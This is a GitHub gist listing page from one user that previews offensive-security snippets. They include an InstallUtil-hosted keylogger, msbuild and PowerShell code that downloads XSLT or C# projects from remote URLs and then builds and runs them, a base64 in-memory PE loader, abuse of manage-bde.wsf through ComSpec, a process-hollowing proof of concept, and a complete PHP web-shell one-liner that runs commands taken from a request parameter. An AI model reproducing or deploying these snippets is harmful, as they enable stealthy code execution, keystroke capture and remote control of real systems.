Skip to content

Instantly share code, notes, and snippets.

View xenoscr's full-sized avatar
💭
Human Popsicle

Conor Richard xenoscr

💭
Human Popsicle
104 followers · 5 following
View GitHub Profile
@xenoscr
xenoscr / InstallUtilMouseKeyLogger.cs
Created February 27, 2018 14:22
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
@xenoscr
xenoscr / xslt.proj
Created March 6, 2018 03:03
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"
@xenoscr
xenoscr / Numbers.Xml
Created March 6, 2018 03:15
XSLT C# Examples
<?xml version='1.0'?>
<data>
<circle>
<radius>12</radius>
</circle>
<circle>
<radius>37.5</radius>
</circle>
</data>
@xenoscr
xenoscr / Build_In_Memory_CSharp_XSLT_Project.txt
Created March 6, 2018 13:20
In-memory PowerShell XSLT project build:
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.build();
@xenoscr
xenoscr / LoadInMemoryModule.ps1
Created March 31, 2018 10:01 — forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
@xenoscr
xenoscr / manage-bde.wsf.txt
Created April 2, 2018 13:42 — forked from bohops/manage-bde.wsf.txt
Abusing manage-bde.wsf
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32.
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways.
Here are a few examples that you may or may not find useful -
1) Replace ComSpec Variable
set comspec=c:\windows\system32\calc.exe
cscript manage-bde.wsf
@xenoscr
xenoscr / Build_In_Memory_CSharp_Project.txt
Created April 4, 2018 14:28 — forked from bohops/Build_In_Memory_CSharp_Project.txt
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
- Launch program (payload)
@xenoscr
xenoscr / Start-Hollow.ps1
Created June 13, 2018 12:02
Process Hollowing with PowerShell - by FuzzySec
function Start-Hollow {
<#
.SYNOPSIS
This is a proof-of-concept for process hollowing. There is nothing new here except
maybe the use of NtCreateProcessEx which has some advantages in that it offers a
convenient way to set a parent process and avoids the bothersome Get/SetThreadContext.
On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's.
I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible
to load the Hollow from an internal byte array straight into memory but I have not
@xenoscr
xenoscr / Simple-Backdoor-One-Liner.php
Created July 5, 2018 02:53 — forked from sente/Simple-Backdoor-One-Liner.php
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
@xenoscr
xenoscr / PEDUMP.C
Created July 10, 2018 16:17
PE Dump - Matt Pietrek 1995
//==================================
// PEDUMP - Matt Pietrek 1995
// FILE: PEDUMP.C
//==================================
#include <windows.h>
#include <stdio.h>
#include "objdump.h"
#include "exedump.h"
#include "dbgdump.h"